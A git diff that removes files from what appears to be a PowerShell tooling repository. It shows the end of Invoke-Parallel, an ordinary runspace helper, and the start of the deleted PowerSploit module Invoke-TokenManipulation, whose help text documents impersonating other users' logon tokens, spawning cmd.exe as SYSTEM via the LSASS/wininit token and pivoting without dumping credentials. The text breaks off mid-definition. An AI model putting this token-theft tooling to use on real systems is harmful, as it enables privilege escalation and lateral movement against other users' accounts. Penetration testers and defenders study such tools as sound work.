$parameter.contentfile - Get-Content $contentFile | - set-content $parameter.logfile - } - - This example uses the parameter argument. This parameter is a single object. To pass multiple items into the script block, we create a custom object (using a PowerShell v3 language) with properties we want to pass in. - - Inside the script block, $parameter is used to reference this parameter object. This example sets a content file, gets content from that file, and sets it to a predefined log file. - - .EXAMPLE - $test = 5 - 1..2 | Invoke-Parallel -ImportVariables {$_ * $test} - - Add variables from the current session to the session state. Without -ImportVariables $Test would not be accessible - - .EXAMPLE - $test = 5 - 1..2 | Invoke-Parallel {$_ * $Using:test} - - Reference a variable from the current session with the $Using: syntax. Requires PowerShell 3 or later. Note that -ImportVariables parameter is no longer necessary. - - .FUNCTIONALITY - PowerShell Language - - .NOTES - Credit to Boe Prox for the base runspace code and $Using implementation - http://learn-powershell.net/2012/05/10/speedy-network-information-query-using-powershell/ - http://gallery.technet.microsoft.com/scriptcenter/Speedy-Network-Information-5b1406fb#content - https://github.com/proxb/PoshRSJob/ - - Credit to T Bryce Yehl for the Quiet and NoCloseOnTimeout implementations - - Credit to Sergei Vorobev for the many ideas and contributions that have improved functionality, reliability, and ease of use - - .LINK - https://github.com/RamblingCookieMonster/Invoke-Parallel - #> - [cmdletbinding(DefaultParameterSetName='ScriptBlock')] - Param ( - [Parameter(Mandatory=$false,position=0,ParameterSetName='ScriptBlock')] - [System.Management.Automation.ScriptBlock]$ScriptBlock, - - [Parameter(Mandatory=$false,ParameterSetName='ScriptFile')] - [ValidateScript({test-path $_ -pathtype leaf})] - $ScriptFile, - - [Parameter(Mandatory=$true,ValueFromPipeline=$true)] - [Alias('CN','__Server','IPAddress','Server','ComputerName')] - [PSObject]$InputObject, - - [PSObject]$Parameter, - - [switch]$ImportVariables, - - [switch]$ImportModules, - - [int]$Throttle = 20, - - [int]$SleepTimer = 200, - - [int]$RunspaceTimeout = 0, - - [switch]$NoCloseOnTimeout = $false, - - [int]$MaxQueue, - - [validatescript({Test-Path (Split-Path $_ -parent)})] - [string]$LogFile = "C:\temp\log.log", - - [switch] $Quiet = $false - ) - - Begin { - - #No max queue specified? Estimate one. - #We use the script scope to resolve an odd PowerShell 2 issue where MaxQueue isn't seen later in the function - if( -not $PSBoundParameters.ContainsKey('MaxQueue') ) - { - if($RunspaceTimeout -ne 0){ $script:MaxQueue = $Throttle } - else{ $script:MaxQueue = $Throttle * 3 } - } - else - { - $script:MaxQueue = $MaxQueue - } - - Write-Verbose "Throttle: '$throttle' SleepTimer '$sleepTimer' runSpaceTimeout '$runspaceTimeout' maxQueue '$maxQueue' logFile '$logFile'" - - #If they want to import variables or modules, create a clean runspace, get loaded items, use those to exclude items - if ($ImportVariables -or $ImportModules) - { - $StandardUserEnv = [powershell]::Create().addscript({ - - #Get modules and snapins in this clean runspace - $Modules = Get-Module | Select -ExpandProperty Name - $Snapins = Get-PSSnapin | Select -ExpandProperty Name - - #Get variables in this clean runspace - #Called last to get vars like $? into session - $Variables = Get-Variable | Select -ExpandProperty Name - - #Return a hashtable where we can access each. - @{ - Variables = $Variables - Modules = $Modules - Snapins = $Snapins - } - }).invoke()[0] - - if ($ImportVariables) { - #Exclude common parameters, bound parameters, and automatic variables - Function _temp {[cmdletbinding()] param() } - $VariablesToExclude = @( (Get-Command _temp | Select -ExpandProperty parameters).Keys + $PSBoundParameters.Keys + $StandardUserEnv.Variables ) - Write-Verbose "Excluding variables $( ($VariablesToExclude | sort ) -join ", ")" - - # we don't use 'Get-Variable -Exclude', because it uses regexps. - # One of the veriables that we pass is '$?'. - # There could be other variables with such problems. - # Scope 2 required if we move to a real module - $UserVariables = @( Get-Variable | Where { -not ($VariablesToExclude -contains $_.Name) } ) - Write-Verbose "Found variables to import: $( ($UserVariables | Select -expandproperty Name | Sort ) -join ", " | Out-String).`n" - - } - - if ($ImportModules) - { - $UserModules = @( Get-Module | Where {$StandardUserEnv.Modules -notcontains $_.Name -and (Test-Path $_.Path -ErrorAction SilentlyContinue)} | Select -ExpandProperty Path ) - $UserSnapins = @( Get-PSSnapin | Select -ExpandProperty Name | Where {$StandardUserEnv.Snapins -notcontains $_ } ) - } - } - - #region functions - - Function Get-RunspaceData { - [cmdletbinding()] - param( [switch]$Wait ) - - #loop through runspaces - #if $wait is specified, keep looping until all complete - Do { - - #set more to false for tracking completion - $more = $false - - #Progress bar if we have inputobject count (bound parameter) - if (-not $Quiet) { - Write-Progress -Activity "Running Query" -Status "Starting threads"` - -CurrentOperation "$startedCount threads defined - $totalCount input objects - $script:completedCount input objects processed"` - -PercentComplete $( Try { $script:completedCount / $totalCount * 100 } Catch {0} ) - } - - #run through each runspace. - Foreach($runspace in $runspaces) { - - #get the duration - inaccurate - $currentdate = Get-Date - $runtime = $currentdate - $runspace.startTime - $runMin = [math]::Round( $runtime.totalminutes ,2 ) - - #set up log object - $log = "" | select Date, Action, Runtime, Status, Details - $log.Action = "Removing:'$($runspace.object)'" - $log.Date = $currentdate - $log.Runtime = "$runMin minutes" - - #If runspace completed, end invoke, dispose, recycle, counter++ - If ($runspace.Runspace.isCompleted) { - - $script:completedCount++ - - #check if there were errors - if($runspace.powershell.Streams.Error.Count -gt 0) { - - #set the logging info and move the file to completed - $log.status = "CompletedWithErrors" - Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] - foreach($ErrorRecord in $runspace.powershell.Streams.Error) { - Write-Error -ErrorRecord $ErrorRecord - } - } - else { - - #add logging details and cleanup - $log.status = "Completed" - Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] - } - - #everything is logged, clean up the runspace - $runspace.powershell.EndInvoke($runspace.Runspace) - $runspace.powershell.dispose() - $runspace.Runspace = $null - $runspace.powershell = $null - - } - - #If runtime exceeds max, dispose the runspace - ElseIf ( $runspaceTimeout -ne 0 -and $runtime.totalseconds -gt $runspaceTimeout) { - - $script:completedCount++ - $timedOutTasks = $true - - #add logging details and cleanup - $log.status = "TimedOut" - Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] - Write-Error "Runspace timed out at $($runtime.totalseconds) seconds for the object:`n$($runspace.object | out-string)" - - #Depending on how it hangs, we could still get stuck here as dispose calls a synchronous method on the powershell instance - if (!$noCloseOnTimeout) { $runspace.powershell.dispose() } - $runspace.Runspace = $null - $runspace.powershell = $null - $completedCount++ - - } - - #If runspace isn't null set more to true - ElseIf ($runspace.Runspace -ne $null ) { - $log = $null - $more = $true - } - - #log the results if a log file was indicated - if($logFile -and $log){ - ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] | out-file $LogFile -append - } - } - - #Clean out unused runspace jobs - $temphash = $runspaces.clone() - $temphash | Where { $_.runspace -eq $Null } | ForEach { - $Runspaces.remove($_) - } - - #sleep for a bit if we will loop again - if($PSBoundParameters['Wait']){ Start-Sleep -milliseconds $SleepTimer } - - #Loop again only if -wait parameter and there are more runspaces to process - } while ($more -and $PSBoundParameters['Wait']) - - #End of runspace function - } - - #endregion functions - - #region Init - - if($PSCmdlet.ParameterSetName -eq 'ScriptFile') - { - $ScriptBlock = [scriptblock]::Create( $(Get-Content $ScriptFile | out-string) ) - } - elseif($PSCmdlet.ParameterSetName -eq 'ScriptBlock') - { - #Start building parameter names for the param block - [string[]]$ParamsToAdd = '$_' - if( $PSBoundParameters.ContainsKey('Parameter') ) - { - $ParamsToAdd += '$Parameter' - } - - $UsingVariableData = $Null - - - # This code enables $Using support through the AST. - # This is entirely from Boe Prox, and his https://github.com/proxb/PoshRSJob module; all credit to Boe! - - if($PSVersionTable.PSVersion.Major -gt 2) - { - #Extract using references - $UsingVariables = $ScriptBlock.ast.FindAll({$args[0] -is [System.Management.Automation.Language.UsingExpressionAst]},$True) - - If ($UsingVariables) - { - $List = New-Object 'System.Collections.Generic.List`1[System.Management.Automation.Language.VariableExpressionAst]' - ForEach ($Ast in $UsingVariables) - { - [void]$list.Add($Ast.SubExpression) - } - - $UsingVar = $UsingVariables | Group SubExpression | ForEach {$_.Group | Select -First 1} - - #Extract the name, value, and create replacements for each - $UsingVariableData = ForEach ($Var in $UsingVar) { - Try - { - $Value = Get-Variable -Name $Var.SubExpression.VariablePath.UserPath -ErrorAction Stop - [pscustomobject]@{ - Name = $Var.SubExpression.Extent.Text - Value = $Value.Value - NewName = ('$__using_{0}' -f $Var.SubExpression.VariablePath.UserPath) - NewVarName = ('__using_{0}' -f $Var.SubExpression.VariablePath.UserPath) - } - } - Catch - { - Write-Error "$($Var.SubExpression.Extent.Text) is not a valid Using: variable!" - } - } - $ParamsToAdd += $UsingVariableData | Select -ExpandProperty NewName -Unique - - $NewParams = $UsingVariableData.NewName -join ', ' - $Tuple = [Tuple]::Create($list, $NewParams) - $bindingFlags = [Reflection.BindingFlags]"Default,NonPublic,Instance" - $GetWithInputHandlingForInvokeCommandImpl = ($ScriptBlock.ast.gettype().GetMethod('GetWithInputHandlingForInvokeCommandImpl',$bindingFlags)) - - $StringScriptBlock = $GetWithInputHandlingForInvokeCommandImpl.Invoke($ScriptBlock.ast,@($Tuple)) - - $ScriptBlock = [scriptblock]::Create($StringScriptBlock) - - Write-Verbose $StringScriptBlock - } - } - - $ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param($($ParamsToAdd -Join ", "))`r`n" + $Scriptblock.ToString()) - } - else - { - Throw "Must provide ScriptBlock or ScriptFile"; Break - } - - Write-Debug "`$ScriptBlock: $($ScriptBlock | Out-String)" - Write-Verbose "Creating runspace pool and session states" - - #If specified, add variables and modules/snapins to session state - $sessionstate = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() - if ($ImportVariables) - { - if($UserVariables.count -gt 0) - { - foreach($Variable in $UserVariables) - { - $sessionstate.Variables.Add( (New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Variable.Name, $Variable.Value, $null) ) - } - } - } - if ($ImportModules) - { - if($UserModules.count -gt 0) - { - foreach($ModulePath in $UserModules) - { - $sessionstate.ImportPSModule($ModulePath) - } - } - if($UserSnapins.count -gt 0) - { - foreach($PSSnapin in $UserSnapins) - { - [void]$sessionstate.ImportPSSnapIn($PSSnapin, [ref]$null) - } - } - } - - #Create runspace pool - $runspacepool = [runspacefactory]::CreateRunspacePool(1, $Throttle, $sessionstate, $Host) - $runspacepool.Open() - - Write-Verbose "Creating empty collection to hold runspace jobs" - $Script:runspaces = New-Object System.Collections.ArrayList - - #If inputObject is bound get a total count and set bound to true - $bound = $PSBoundParameters.keys -contains "InputObject" - if(-not $bound) - { - [System.Collections.ArrayList]$allObjects = @() - } - - #Set up log file if specified - if( $LogFile ){ - New-Item -ItemType file -path $logFile -force | Out-Null - ("" | Select Date, Action, Runtime, Status, Details | ConvertTo-Csv -NoTypeInformation -Delimiter ";")[0] | Out-File $LogFile - } - - #write initial log entry - $log = "" | Select Date, Action, Runtime, Status, Details - $log.Date = Get-Date - $log.Action = "Batch processing started" - $log.Runtime = $null - $log.Status = "Started" - $log.Details = $null - if($logFile) { - ($log | convertto-csv -Delimiter ";" -NoTypeInformation)[1] | Out-File $LogFile -Append - } - - $timedOutTasks = $false - - #endregion INIT - } - - Process { - - #add piped objects to all objects or set all objects to bound input object parameter - if($bound) - { - $allObjects = $InputObject - } - Else - { - [void]$allObjects.add( $InputObject ) - } - } - - End { - - #Use Try/Finally to catch Ctrl+C and clean up. - Try - { - #counts for progress - $totalCount = $allObjects.count - $script:completedCount = 0 - $startedCount = 0 - - foreach($object in $allObjects){ - - #region add scripts to runspace pool - - #Create the powershell instance, set verbose if needed, supply the scriptblock and parameters - $powershell = [powershell]::Create() - - if ($VerbosePreference -eq 'Continue') - { - [void]$PowerShell.AddScript({$VerbosePreference = 'Continue'}) - } - - [void]$PowerShell.AddScript($ScriptBlock).AddArgument($object) - - if ($parameter) - { - [void]$PowerShell.AddArgument($parameter) - } - - # $Using support from Boe Prox - if ($UsingVariableData) - { - Foreach($UsingVariable in $UsingVariableData) { - Write-Verbose "Adding $($UsingVariable.Name) with value: $($UsingVariable.Value)" - [void]$PowerShell.AddArgument($UsingVariable.Value) - } - } - - #Add the runspace into the powershell instance - $powershell.RunspacePool = $runspacepool - - #Create a temporary collection for each runspace - $temp = "" | Select-Object PowerShell, StartTime, object, Runspace - $temp.PowerShell = $powershell - $temp.StartTime = Get-Date - $temp.object = $object - - #Save the handle output when calling BeginInvoke() that will be used later to end the runspace - $temp.Runspace = $powershell.BeginInvoke() - $startedCount++ - - #Add the temp tracking info to $runspaces collection - Write-Verbose ( "Adding {0} to collection at {1}" -f $temp.object, $temp.starttime.tostring() ) - $runspaces.Add($temp) | Out-Null - - #loop through existing runspaces one time - Get-RunspaceData - - #If we have more running than max queue (used to control timeout accuracy) - #Script scope resolves odd PowerShell 2 issue - $firstRun = $true - while ($runspaces.count -ge $Script:MaxQueue) { - - #give verbose output - if($firstRun){ - Write-Verbose "$($runspaces.count) items running - exceeded $Script:MaxQueue limit." - } - $firstRun = $false - - #run get-runspace data and sleep for a short while - Get-RunspaceData - Start-Sleep -Milliseconds $sleepTimer - - } - - #endregion add scripts to runspace pool - } - - Write-Verbose ( "Finish processing the remaining runspace jobs: {0}" -f ( @($runspaces | Where {$_.Runspace -ne $Null}).Count) ) - Get-RunspaceData -wait - - if (-not $quiet) { - Write-Progress -Activity "Running Query" -Status "Starting threads" -Completed - } - } - Finally - { - #Close the runspace pool, unless we specified no close on timeout and something timed out - if ( ($timedOutTasks -eq $false) -or ( ($timedOutTasks -eq $true) -and ($noCloseOnTimeout -eq $false) ) ) { - Write-Verbose "Closing the runspace pool" - $runspacepool.close() - } - - #collect garbage - [gc]::Collect() - } - } -} diff --git a/scripts/Invoke-TokenManipulation.ps1 b/scripts/Invoke-TokenManipulation.ps1 deleted file mode 100644 index ea30952..0000000 --- a/scripts/Invoke-TokenManipulation.ps1 +++ /dev/null @@ -1,1917 +0,0 @@ -function Invoke-TokenManipulation -{ -<# -.SYNOPSIS - -This script requires Administrator privileges. It can enumerate the Logon Tokens available and use them to create new processes. This allows you to use -anothers users credentials over the network by creating a process with their logon token. This will work even with Windows 8.1 LSASS protections. -This functionality is very similar to the incognito tool (with some differences, and different use goals). - -This script can also make the PowerShell thread impersonate another users Logon Token. Unfortunately this doesn't work well, because PowerShell -creates new threads to do things, and those threads will use the Primary token of the PowerShell process (your original token) and not the token -that one thread is impersonating. Because of this, you cannot use thread impersonation to impersonate a user and then use PowerShell remoting to connect -to another server as that user (it will authenticate using the primary token of the process, which is your original logon token). - -Because of this limitation, the recommended way to use this script is to use CreateProcess to create a new PowerShell process with another users Logon -Token, and then use this process to pivot. This works because the entire process is created using the other users Logon Token, so it will use their -credentials for the authentication. - -IMPORTANT: If you are creating a process, by default this script will modify the ACL of the current users desktop to allow full control to "Everyone". -This is done so that the UI of the process is shown. If you do not need the UI, use the -NoUI flag to prevent the ACL from being modified. This ACL -is not permenant, as in, when the current logs off the ACL is cleared. It is still preferrable to not modify things unless they need to be modified though, -so I created the NoUI flag. ALSO: When creating a process, the script will request SeSecurityPrivilege so it can enumerate and modify the ACL of the desktop. -This could show up in logs depending on the level of monitoring. - - -PERMISSIONS REQUIRED: -SeSecurityPrivilege: Needed if launching a process with a UI that needs to be rendered. Using the -NoUI flag blocks this. -SeAssignPrimaryTokenPrivilege : Needed if launching a process while the script is running in Session 0. - - -Important differences from incognito: -First of all, you should probably read the incognito white paper to understand what incognito does. If you use incognito, you'll notice it differentiates -between "Impersonation" and "Delegation" tokens. This is because incognito can be used in situations where you get remote code execution against a service -which has threads impersonating multiple users. Incognito can enumerate all tokens available to the service process, and impersonate them (which might allow -you to elevate privileges). This script must be run as administrator, and because you are already an administrator, the primary use of this script is for pivoting -without dumping credentials. - -In this situation, Impersonation vs Delegation does not matter because an administrator can turn any token in to a primary token (delegation rights). What does -matter is the logon type used to create the logon token. If a user connects using Network Logon (aka type 3 logon), the computer will not have any credentials for -the user. Since the computer has no credentials associated with the token, it will not be possible to authenticate off-box with the token. All other logon types -should have credentials associated with them (such as Interactive logon, Service logon, Remote interactive logon, etc). Therefore, this script looks -for tokens which were created with desirable logon tokens (and only displays them by default). - -In a nutshell, instead of worrying about "delegation vs impersonation" tokens, you should worry about NetworkLogon (bad) vs Non-NetworkLogon (good). - - -PowerSploit Function: Invoke-TokenManipulation -Author: Joe Bialek, Twitter: @JosephBialek -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. - -.PARAMETER Enumerate - -Switch. Specifics to enumerate logon tokens available. By default this will only list unqiue usable tokens (not network-logon tokens). - -.PARAMETER RevToSelf - -Switch. Stops impersonating an alternate users Token. - -.PARAMETER ShowAll - -Switch. Enumerate all Logon Tokens (including non-unique tokens and NetworkLogon tokens). - -.PARAMETER ImpersonateUser - -Switch. Will impersonate an alternate users logon token in the PowerShell thread. Can specify the token to use by Username, ProcessId, or ThreadId. - This mode is not recommended because PowerShell is heavily threaded and many actions won't be done in the current thread. Use CreateProcess instead. - -.PARAMETER CreateProcess - -Specify a process to create with an alternate users logon token. Can specify the token to use by Username, ProcessId, or ThreadId. - -.PARAMETER WhoAmI - -Switch. Displays the credentials the PowerShell thread is running under. - -.PARAMETER Username - -Specify the Token to use by username. This will choose a non-NetworkLogon token belonging to the user. - -.PARAMETER ProcessId - -Specify the Token to use by ProcessId. This will use the primary token of the process specified. - -.PARAMETER Process - -Specify the token to use by process object (will use the processId under the covers). This will impersonate the primary token of the process. - -.PARAMETER ThreadId - -Specify the Token to use by ThreadId. This will use the token of the thread specified. - -.PARAMETER ProcessArgs - -Specify the arguments to start the specified process with when using the -CreateProcess mode. - -.PARAMETER NoUI - -If you are creating a process which doesn't need a UI to be rendered, use this flag. This will prevent the script from modifying the Desktop ACL's of the -current user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control -to "Everyone". - -.PARAMETER PassThru - -If you are creating a process, this will pass the System.Diagnostics.Process object to the pipeline. - - -.EXAMPLE - -Invoke-TokenManipulation -Enumerate - -Lists all unique usable tokens on the computer. - -.EXAMPLE - -Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system" - -Spawns cmd.exe as SYSTEM. - -.EXAMPLE - -Invoke-TokenManipulation -ImpersonateUser -Username "nt authority\system" - -Makes the current PowerShell thread impersonate SYSTEM. - -.EXAMPLE - -Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500 - -Spawns cmd.exe using the primary token belonging to process ID 500. - -.EXAMPLE - -Invoke-TokenManipulation -ShowAll - -Lists all tokens available on the computer, including non-unique tokens and tokens created using NetworkLogon. - -.EXAMPLE - -Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500 - -Spawns cmd.exe using the token belonging to thread ID 500. - -.EXAMPLE - -Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" - -Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Get-Process to the "-Process" parameter of the script. - -.EXAMPLE - -(Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" -PassThru).WaitForExit() - -Spawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited. - -.EXAMPLE - -Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser - -Makes the current thread impersonate the lsass security token. - -.NOTES -This script was inspired by incognito. - -Several of the functions used in this script were written by Matt Graeber(Twitter: @mattifestation, Blog: http://www.exploit-monday.com/). -BIG THANKS to Matt Graeber for helping debug. - -.LINK - -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell -Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/ - -#> - - [CmdletBinding(DefaultParameterSetName="Enumerate")] - Param( - [Parameter(ParameterSetName = "Enumerate")] - [Switch] - $Enumerate, - - [Parameter(ParameterSetName = "RevToSelf")] - [Switch] - $RevToSelf, - - [Parameter(ParameterSetName = "ShowAll")] - [Switch] - $ShowAll, - - [Parameter(ParameterSetName = "ImpersonateUser")] - [Switch] - $ImpersonateUser, - - [Parameter(ParameterSetName = "CreateProcess")] - [String] - $CreateProcess, - - [Parameter(ParameterSetName = "WhoAmI")] - [Switch] - $WhoAmI, - - [Parameter(ParameterSetName = "ImpersonateUser")] - [Parameter(ParameterSetName = "CreateProcess")] - [String] - $Username, - - [Parameter(ParameterSetName = "ImpersonateUser")] - [Parameter(ParameterSetName = "CreateProcess")] - [Int] - $ProcessId, - - [Parameter(ParameterSetName = "ImpersonateUser", ValueFromPipeline=$true)] - [Parameter(ParameterSetName = "CreateProcess", ValueFromPipeline=$true)] - [System.Diagnostics.Process] - $Process, - - [Parameter(ParameterSetName = "ImpersonateUser")] - [Parameter(ParameterSetName = "CreateProcess")] - $ThreadId, - - [Parameter(ParameterSetName = "CreateProcess")] - [String] - $ProcessArgs, - - [Parameter(ParameterSetName = "CreateProcess")] - [Switch] - $NoUI, - - [Parameter(ParameterSetName = "CreateProcess")] - [Switch] - $PassThru - ) - - Set-StrictMode -Version 2 - - #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ - Function Get-DelegateType - { - Param - ( - [OutputType([Type])] - - [Parameter( Position = 0)] - [Type[]] - $Parameters = (New-Object Type[](0)), - - [Parameter( Position = 1 )] - [Type] - $ReturnType = [Void] - ) - - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) - $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) - $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) - $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') - $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) - $MethodBuilder.SetImplementationFlags('Runtime, Managed') - - Write-Output $TypeBuilder.CreateType() - } - - - #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ - Function Get-ProcAddress - { - Param - ( - [OutputType([IntPtr])] - - [Parameter( Position = 0, Mandatory = $True )] - [String] - $Module, - - [Parameter( Position = 1, Mandatory = $True )] - [String] - $Procedure - ) - - # Get a reference to System.dll in the GAC - $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | - Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } - $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') - # Get a reference to the GetModuleHandle and GetProcAddress methods - $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') - $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') - # Get a handle to the module specified - $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) - $tmpPtr = New-Object IntPtr - $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) - - # Return the address of the function - Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) - } - - ############################### - #Win32Constants - ############################### - $Constants = @{ - ACCESS_SYSTEM_SECURITY = 0x01000000 - READ_CONTROL = 0x00020000 - SYNCHRONIZE = 0x00100000 - STANDARD_RIGHTS_ALL = 0x001F0000 - TOKEN_QUERY = 8 - TOKEN_ADJUST_PRIVILEGES = 0x20 - ERROR_NO_TOKEN = 0x3f0 - SECURITY_DELEGATION = 3 - DACL_SECURITY_INFORMATION = 0x4 - ACCESS_ALLOWED_ACE_TYPE = 0x0 - STANDARD_RIGHTS_REQUIRED = 0x000F0000 - DESKTOP_GENERIC_ALL = 0x000F01FF - WRITE_DAC = 0x00040000 - OBJECT_INHERIT_ACE = 0x1 - GRANT_ACCESS = 0x1 - TRUSTEE_IS_NAME = 0x1 - TRUSTEE_IS_SID = 0x0 - TRUSTEE_IS_USER = 0x1 - TRUSTEE_IS_WELL_KNOWN_GROUP = 0x5 - TRUSTEE_IS_GROUP = 0x2 - PROCESS_QUERY_INFORMATION = 0x400 - TOKEN_ASSIGN_PRIMARY = 0x1 - TOKEN_DUPLICATE = 0x2 - TOKEN_IMPERSONATE = 0x4 - TOKEN_QUERY_SOURCE = 0x10 - STANDARD_RIGHTS_READ = 0x20000 - TokenStatistics = 10 - TOKEN_ALL_ACCESS = 0xf01ff - MAXIMUM_ALLOWED = 0x02000000 - THREAD_ALL_ACCESS = 0x1f03ff - ERROR_INVALID_PARAMETER = 0x57 - LOGON_NETCREDENTIALS_ONLY = 0x2 - SE_PRIVILEGE_ENABLED = 0x2 - SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1 - SE_PRIVILEGE_REMOVED = 0x4 - } - - $Win32Constants = New-Object PSObject -Property $Constants - ############################### - - - ############################### - #Win32Structures - ############################### - #Define all the structures/enums that will be used - # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html - $Domain = [AppDomain]::CurrentDomain - $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) - $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] - - #ENUMs - $TypeBuilder = $ModuleBuilder.DefineEnum('TOKEN_INFORMATION_CLASS', 'Public', [UInt32]) - $TypeBuilder.DefineLiteral('TokenUser', [UInt32] 1) | Out-Null - $TypeBuilder.DefineLiteral('TokenGroups', [UInt32] 2) | Out-Null - $TypeBuilder.DefineLiteral('TokenPrivileges', [UInt32] 3) | Out-Null - $TypeBuilder.DefineLiteral('TokenOwner', [UInt32] 4) | Out-Null - $TypeBuilder.DefineLiteral('TokenPrimaryGroup', [UInt32] 5) | Out-Null - $TypeBuilder.DefineLiteral('TokenDefaultDacl', [UInt32] 6) | Out-Null - $TypeBuilder.DefineLiteral('TokenSource', [UInt32] 7) | Out-Null - $TypeBuilder.DefineLiteral('TokenType', [UInt32] 8) | Out-Null - $TypeBuilder.DefineLiteral('TokenImpersonationLevel', [UInt32] 9) | Out-Null - $TypeBuilder.DefineLiteral('TokenStatistics', [UInt32] 10) | Out-Null - $TypeBuilder.DefineLiteral('TokenRestrictedSids', [UInt32] 11) | Out-Null - $TypeBuilder.DefineLiteral('TokenSessionId', [UInt32] 12) | Out-Null - $TypeBuilder.DefineLiteral('TokenGroupsAndPrivileges', [UInt32] 13) | Out-Null - $TypeBuilder.DefineLiteral('TokenSessionReference', [UInt32] 14) | Out-Null - $TypeBuilder.DefineLiteral('TokenSandBoxInert', [UInt32] 15) | Out-Null - $TypeBuilder.DefineLiteral('TokenAuditPolicy', [UInt32] 16) | Out-Null - $TypeBuilder.DefineLiteral('TokenOrigin', [UInt32] 17) | Out-Null - $TypeBuilder.DefineLiteral('TokenElevationType', [UInt32] 18) | Out-Null - $TypeBuilder.DefineLiteral('TokenLinkedToken', [UInt32] 19) | Out-Null - $TypeBuilder.DefineLiteral('TokenElevation', [UInt32] 20) | Out-Null - $TypeBuilder.DefineLiteral('TokenHasRestrictions', [UInt32] 21) | Out-Null - $TypeBuilder.DefineLiteral('TokenAccessInformation', [UInt32] 22) | Out-Null - $TypeBuilder.DefineLiteral('TokenVirtualizationAllowed', [UInt32] 23) | Out-Null - $TypeBuilder.DefineLiteral('TokenVirtualizationEnabled', [UInt32] 24) | Out-Null - $TypeBuilder.DefineLiteral('TokenIntegrityLevel', [UInt32] 25) | Out-Null - $TypeBuilder.DefineLiteral('TokenUIAccess', [UInt32] 26) | Out-Null - $TypeBuilder.DefineLiteral('TokenMandatoryPolicy', [UInt32] 27) | Out-Null - $TypeBuilder.DefineLiteral('TokenLogonSid', [UInt32] 28) | Out-Null - $TypeBuilder.DefineLiteral('TokenIsAppContainer', [UInt32] 29) | Out-Null - $TypeBuilder.DefineLiteral('TokenCapabilities', [UInt32] 30) | Out-Null - $TypeBuilder.DefineLiteral('TokenAppContainerSid', [UInt32] 31) | Out-Null - $TypeBuilder.DefineLiteral('TokenAppContainerNumber', [UInt32] 32) | Out-Null - $TypeBuilder.DefineLiteral('TokenUserClaimAttributes', [UInt32] 33) | Out-Null - $TypeBuilder.DefineLiteral('TokenDeviceClaimAttributes', [UInt32] 34) | Out-Null - $TypeBuilder.DefineLiteral('TokenRestrictedUserClaimAttributes', [UInt32] 35) | Out-Null - $TypeBuilder.DefineLiteral('TokenRestrictedDeviceClaimAttributes', [UInt32] 36) | Out-Null - $TypeBuilder.DefineLiteral('TokenDeviceGroups', [UInt32] 37) | Out-Null - $TypeBuilder.DefineLiteral('TokenRestrictedDeviceGroups', [UInt32] 38) | Out-Null - $TypeBuilder.DefineLiteral('TokenSecurityAttributes', [UInt32] 39) | Out-Null - $TypeBuilder.DefineLiteral('TokenIsRestricted', [UInt32] 40) | Out-Null - $TypeBuilder.DefineLiteral('MaxTokenInfoClass', [UInt32] 41) | Out-Null - $TOKEN_INFORMATION_CLASS = $TypeBuilder.CreateType() - - #STRUCTs - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('LARGE_INTEGER', $Attributes, [System.ValueType], 8) - 